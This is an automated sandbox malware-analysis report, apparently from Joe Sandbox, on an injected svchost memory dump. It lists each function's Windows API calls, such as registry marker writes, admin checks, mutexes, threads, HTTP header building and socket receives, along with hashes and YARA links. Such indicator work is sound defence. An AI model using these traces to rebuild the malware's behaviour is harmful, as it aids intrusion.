                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Processmemset$AllocFreeInternetOptionQueryValidatememcpy
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3911349929-0
                                                                                                                                                                                                            • Opcode ID: 3b47ffc03df7bccae93ebc883bf1e46a15468ce7319b93bfc744b909056eae01
                                                                                                                                                                                                            • Instruction ID: 7350d4f0af38a8bac6b638da8aa0a5de28e76fc12fb81255f84488d85783ebeb
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3b47ffc03df7bccae93ebc883bf1e46a15468ce7319b93bfc744b909056eae01
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C1418E72A40305AFDB21DFA8DC84F5AB7F8EF84710F008959E94697680DB71EA14CBE0
                                                                                                                                                                                                            Function 02C7E2E0 Relevance: 16.5, APIs: 13, Instructions: 218memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,-0597B008,00000000,00000000,?,?,?,?), ref: 02C7E324
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02C7E32B
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C7E33B
                                                                                                                                                                                                            • memcpy.MSVCRT(00000000,?,?,00000000,00000000,?), ref: 02C7E346
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(?,00000000,00000000,?,?,02CB36B4,?,02CB3DE4,-0597B008,00000000,00000000,?), ref: 02C7E40E
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C7E415
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(?,00000000), ref: 02C7E421
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C7E428
                                                                                                                                                                                                            • memcpy.MSVCRT(?,00000000,?,?,?,?,?,02CB3DE4,-0597B008,00000000,00000000,?), ref: 02C7E44E
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,-0597B008,00000000,00000000,?,?,?,?), ref: 02C7E47A
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C7E47D
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C7E48A
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C7E48D
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$FreeValidatememcpy$Allocmemset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1948005343-0
                                                                                                                                                                                                            • Opcode ID: a40c66fdaf0112aab8bbe067be471c51554bc826174dd919857f03d9f0225b0f
                                                                                                                                                                                                            • Instruction ID: 81e6e9af924028ffee4f43b75ffaa7436fad0c47c8715583036e619129a02199
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a40c66fdaf0112aab8bbe067be471c51554bc826174dd919857f03d9f0225b0f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5261A673B002199BDB11DF99D884AAAB7A9FF88714F0486A5FD0997340D771EE11CBE0
                                                                                                                                                                                                            Function 02C76B50 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 124registrymemoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C76B83
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C76B9B
                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000101,?,?,?,?,?,?,7556F380), ref: 02C76BBC
                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,00000104,00000000,00000001,?,00000104,?,?,?,?,?,7556F380), ref: 02C76BE2
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,7556F380), ref: 02C76C6D
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,7556F380), ref: 02C76C74
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C76C83
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,7556F380), ref: 02C76CB3
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memset$Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                            • String ID: software\microsoft
                                                                                                                                                                                                            • API String ID: 4158279268-3673152959
                                                                                                                                                                                                            • Opcode ID: 90201f7ca9359d800aed87972a28eb2b708b985beff4ee246ce9ad195b8c8ef2
                                                                                                                                                                                                            • Instruction ID: f00bfaf2064b4f9c923215d3669394f2093518c029f08b413f135ced1ddba1f1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 90201f7ca9359d800aed87972a28eb2b708b985beff4ee246ce9ad195b8c8ef2
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 77410571E4055DAFEB15DB749C88AEAB7ADEF98304F1045A8E549D7140E3708F498BA0
                                                                                                                                                                                                            Function 02C823A0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 39registryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C823A7
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 02C823B9
                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(user!965543!09C06683,software\microsoft,00000000,00000102,02C84A6F,?,02C84A6F), ref: 02C823D3
                                                                                                                                                                                                            • RegSetValueExA.ADVAPI32(02C84A6F,92F35CFEa,00000000,00000004,00000004,00000004,02C84A6F), ref: 02C823F0
                                                                                                                                                                                                            • RegFlushKey.ADVAPI32(?), ref: 02C823FA
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 02C82404
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AdminCloseCountFlushOpenTickUserValue
                                                                                                                                                                                                            • String ID: 92F35CFEa$user!965543!09C06683$software\microsoft
                                                                                                                                                                                                            • API String ID: 287100044-273523247
                                                                                                                                                                                                            • Opcode ID: 8f6cdfb92d119de1b8484a46a2feac68937d8403caffc9ce92df36176a82f031
                                                                                                                                                                                                            • Instruction ID: 3b1379d1164551cb229a6ca7f0a1ba3dadd87f54f5e1a5cc4ea733abf2b871cf
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8f6cdfb92d119de1b8484a46a2feac68937d8403caffc9ce92df36176a82f031
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 60F03C79D80258FBE701DBA0AC4AF9A773CAF04601F104695FE06A3180D670AA159BA5
                                                                                                                                                                                                            Function 02C7EB10 Relevance: 15.3, APIs: 7, Strings: 3, Instructions: 271COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memcpy.MSVCRT(?,?,00000000), ref: 02C7EBEA
                                                                                                                                                                                                            • memcpy.MSVCRT(00000000,?,?,?,?,?,00001100,?,?,?,?,?,?,?,?,?), ref: 02C7EC9A
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C7ECB6
                                                                                                                                                                                                            • memcpy.MSVCRT(?,?,?), ref: 02C7ECC5
                                                                                                                                                                                                            • memcpy.MSVCRT(?,?,?,?,?,Content-Length,?), ref: 02C7ED1C
                                                                                                                                                                                                            • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 02C7ED3D
                                                                                                                                                                                                            • memcpy.MSVCRT(?,?,?), ref: 02C7EDBF
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memcpy$_snprintf
                                                                                                                                                                                                            • String ID: 0$%x$Content-Length
                                                                                                                                                                                                            • API String ID: 4125937431-3838797520
                                                                                                                                                                                                            • Opcode ID: 33af21bc4f9b3d582628b9cae9a83cdf2460a5ddc0ce9f7ac8dce1af683e3ede
                                                                                                                                                                                                            • Instruction ID: 52476407a82d41700fb536315d3cc800fccaa62d03a276dfe78a9bb67cd9490d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 33af21bc4f9b3d582628b9cae9a83cdf2460a5ddc0ce9f7ac8dce1af683e3ede
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 87916FB2600746AFC714DF68D88496AB7E9FF98314F048B69F82987644E770E914CBE1
                                                                                                                                                                                                            Function 02C750D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 110synchronizationCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C75110
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C7513C
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C75163
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C75184
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(000002C0,000003E8), ref: 02C751B4
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(000002C0), ref: 02C751D5
                                                                                                                                                                                                            • SetLastError.KERNEL32(?), ref: 02C751EE
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: QueryVirtual$ErrorLast$MutexObjectReleaseSingleWait
                                                                                                                                                                                                            • String ID: P0Wu
                                                                                                                                                                                                            • API String ID: 2971961948-465009422
                                                                                                                                                                                                            • Opcode ID: 70f9fc3143bf534cca684f0e4e89fc85c5a61feea77cab146b802c1c70a26e28
                                                                                                                                                                                                            • Instruction ID: 624dc36d533c102a67ddf76a704838ae94d69d864442ab1e9e144c3c66c6519f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 70f9fc3143bf534cca684f0e4e89fc85c5a61feea77cab146b802c1c70a26e28
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B41B975E40208EFDB40DFA9D884AEDBBF5FB88351F51456AE904E7200E774AA01CF90
                                                                                                                                                                                                            Function 02C75200 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 97synchronizationCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C75218
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C75249
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C75275
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C7529C
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(000002C0,000003E8), ref: 02C752CD
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(000002C0), ref: 02C752EE
                                                                                                                                                                                                            • SetLastError.KERNEL32(?), ref: 02C752F8
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: QueryVirtual$ErrorLast$MutexObjectReleaseSingleWait
                                                                                                                                                                                                            • String ID: P0Wu
                                                                                                                                                                                                            • API String ID: 2971961948-465009422
                                                                                                                                                                                                            • Opcode ID: ce913c20827457bea48ee1bafbd5fd172c027c311be6c2699a490eb7730b090c
                                                                                                                                                                                                            • Instruction ID: 30c5bc5ae0f3d323f0229e5c14f4cc7f50c54d2b51a2aeee4670010bc99a5d1c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ce913c20827457bea48ee1bafbd5fd172c027c311be6c2699a490eb7730b090c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: CB31B5B5E40258AFDB40DFE9D884ADDBBF9FB48310F50856AE918E7240E7749A11CF90
                                                                                                                                                                                                            Function 02C806F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 95registryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C80710
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C8072E
                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000102,-80000001,?,?,?,?,?,?,0000001C,00000000), ref: 02C807CD
                                                                                                                                                                                                            • RegSetValueExA.ADVAPI32(-80000001,92F35DE2a,00000000,00000001,?,00000104,?,?,?,?,0000001C,00000000), ref: 02C807EF
                                                                                                                                                                                                            • RegFlushKey.ADVAPI32(-80000001,?,?,?,?,0000001C,00000000), ref: 02C807FD
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(-80000001,?,?,?,?,0000001C,00000000), ref: 02C80810
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memset$CloseFlushOpenValue
                                                                                                                                                                                                            • String ID: 92F35DE2a$software\microsoft
                                                                                                                                                                                                            • API String ID: 2470402893-1434664175
                                                                                                                                                                                                            • Opcode ID: 3fc1bccc21e8b7fb971e5db50c4987e6af6c69b5ce80e0ac5938bc282a744586
                                                                                                                                                                                                            • Instruction ID: fcc44ad502bfe9a342a1e66f398fc18f980509a9af6c2acc1215a477518a3881
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3fc1bccc21e8b7fb971e5db50c4987e6af6c69b5ce80e0ac5938bc282a744586
                                                                                                                                                                                                            • Instruction Fuzzy Hash: BF31F870A04248AFEB15EB74DC88FEE77A9DF54708F1085A8E585D7141E6709EC98B90
                                                                                                                                                                                                            Function 02C8AB20 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 92threadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\private\), ref: 02C8AB49
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C8AAF0,00000000,00000000,00000000), ref: 02C8AB96
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\public\), ref: 02C8ABAE
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C8AAD0,00000000,00000000,00000000), ref: 02C8ABF2
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C8AC0A
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C8AC1B
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateHandleThread$CloseInformation
                                                                                                                                                                                                            • String ID: \private\$\public\
                                                                                                                                                                                                            • API String ID: 677819612-281496920
                                                                                                                                                                                                            • Opcode ID: 0a4440110d42e8da86999d1edf3a9dac1824afa8cb82750815a93b5b3e5396a2
                                                                                                                                                                                                            • Instruction ID: 459944f8d6a44322f75390ca40d196e11bb48cfee441a594600555a0848a885f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0a4440110d42e8da86999d1edf3a9dac1824afa8cb82750815a93b5b3e5396a2
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 493109309817149FE7216B14EC09BA67758DF81B0DF14C65BEA055B2C0C7B59648DFD4
                                                                                                                                                                                                            Function 02C7D200 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 02C7D21B
                                                                                                                                                                                                            • GetLastActivePopup.USER32(?), ref: 02C7D229
                                                                                                                                                                                                            • GetWindow.USER32(00000000,00000005), ref: 02C7D243
                                                                                                                                                                                                            • GetWindow.USER32(00000000), ref: 02C7D246
                                                                                                                                                                                                            • GetWindowInfo.USER32(00000000,?), ref: 02C7D25C
                                                                                                                                                                                                            • GetWindow.USER32(00000000,00000004), ref: 02C7D265
                                                                                                                                                                                                            • GetWindow.USER32(00000000,00000003), ref: 02C7D29E
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Window$ActiveInfoLastLongPopup
                                                                                                                                                                                                            • String ID: <
                                                                                                                                                                                                            • API String ID: 3748940024-4251816714
                                                                                                                                                                                                            • Opcode ID: 6566fcbd06473202438ac9c479076b65a869ccce2ce16732eb24cbd94813201e
                                                                                                                                                                                                            • Instruction ID: ad51b8ab07b6a8a0a47f95f8dc24954f2c3c838c14de4cce43531096e268ba51
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6566fcbd06473202438ac9c479076b65a869ccce2ce16732eb24cbd94813201e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2B110B71A4061516DB22A9699CC9FAFBB5CEFD1354F040665FE02F3180DB60DE428BA0
                                                                                                                                                                                                            Function 02C7C910 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 53synchronizationthreadwindowCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C7C8E0,00000000,00000000,00000000), ref: 02C7C924
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000,?,?,02C78DCA,?,?,?,?,02C78F99,00000000,?,?,?,?,02C78500), ref: 02C7C93C
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,02C78DCA,?,?,?,?,02C78F99,00000000,?,?,?,?,02C78500,?), ref: 02C7C94D
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,02C78DCA,?,?,?,?,02C78F99,00000000,?,?,?,?,02C78500), ref: 02C7C95C
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C7C990
                                                                                                                                                                                                            • IsWindow.USER32(?), ref: 02C7C997
                                                                                                                                                                                                            • PostMessageA.USER32(?,00000215,00000000,00000000), ref: 02C7C9AB
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$CloseCreateInformationMessageMutexObjectPostReleaseSingleThreadWaitWindow
                                                                                                                                                                                                            • String ID: P0Wu
                                                                                                                                                                                                            • API String ID: 731183410-465009422
                                                                                                                                                                                                            • Opcode ID: 898a5462f15b66eb5b6a881246f3b77817fdb00d5b63b46bcc56904acff011f1
                                                                                                                                                                                                            • Instruction ID: dc847c986a7579aa9beb734f0ddc6753ee581b3efceb7b23b13afb8658165d64
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 898a5462f15b66eb5b6a881246f3b77817fdb00d5b63b46bcc56904acff011f1
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE11C830E81315BBE7129F60EC0EF9A3BA8AF45714F1447A5FA149B2C1D7B46710CB94
                                                                                                                                                                                                            Function 02C729B0 Relevance: 13.7, APIs: 9, Instructions: 198COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: callocexitfree
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3367576030-0
                                                                                                                                                                                                            • Opcode ID: bbcff4de4a4894e0a6d107a95d912f7d4d6b507eb13154987a22060052d57127
                                                                                                                                                                                                            • Instruction ID: 9e9d0ca8c05ed3c8b7aa55220ca6670d6b8bda956e2584675a14374352471800
                                                                                                                                                                                                            • Opcode Fuzzy Hash: bbcff4de4a4894e0a6d107a95d912f7d4d6b507eb13154987a22060052d57127
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1961A475A00609AFEB20DF69C880BAEB7B5FF88314F148459ED0697340D771EA51CF92
                                                                                                                                                                                                            Function 02C9C140 Relevance: 13.7, APIs: 9, Instructions: 191fileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: free$malloc$CloseFileHandleReadselect
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 158848325-0
                                                                                                                                                                                                            • Opcode ID: fe96fb7445081e0d6b7b4217289d3908891c8ab8d549666e3766b5898d1a3772
                                                                                                                                                                                                            • Instruction ID: 700ab6dcdf6e10d77520856caff018f3a20b3bd56e95b8683181c0d6a86973f5
                                                                                                                                                                                                            • Opcode Fuzzy Hash: fe96fb7445081e0d6b7b4217289d3908891c8ab8d549666e3766b5898d1a3772
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2351C771D00659ABDB10CFA99C88BFFB7F8EB88724F14056AE51DD7280D631AB018B91
                                                                                                                                                                                                            Function 02C98890 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 226timeCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 02C9EAA0: select.WS2_32(?,?,00000000,00000000,?), ref: 02C9EB27
                                                                                                                                                                                                              • Part of subcall function 02C9EAA0: __WSAFDIsSet.WS2_32(?,?), ref: 02C9EB58
                                                                                                                                                                                                              • Part of subcall function 02C9EAA0: recv.WS2_32(?,?,00000005,00000000), ref: 02C9EB7B
                                                                                                                                                                                                              • Part of subcall function 02C9EAA0: recv.WS2_32(?,?,00000004,00000000), ref: 02C9EB9D
                                                                                                                                                                                                              • Part of subcall function 02C9EAA0: socket.WS2_32(00000002,00000001,00000000), ref: 02C9EBB6
                                                                                                                                                                                                              • Part of subcall function 02C9EAA0: setsockopt.WS2_32(00000000,00000006,00000001,00000001,00000004), ref: 02C9EBD2
                                                                                                                                                                                                            • malloc.MSVCRT ref: 02C988B3
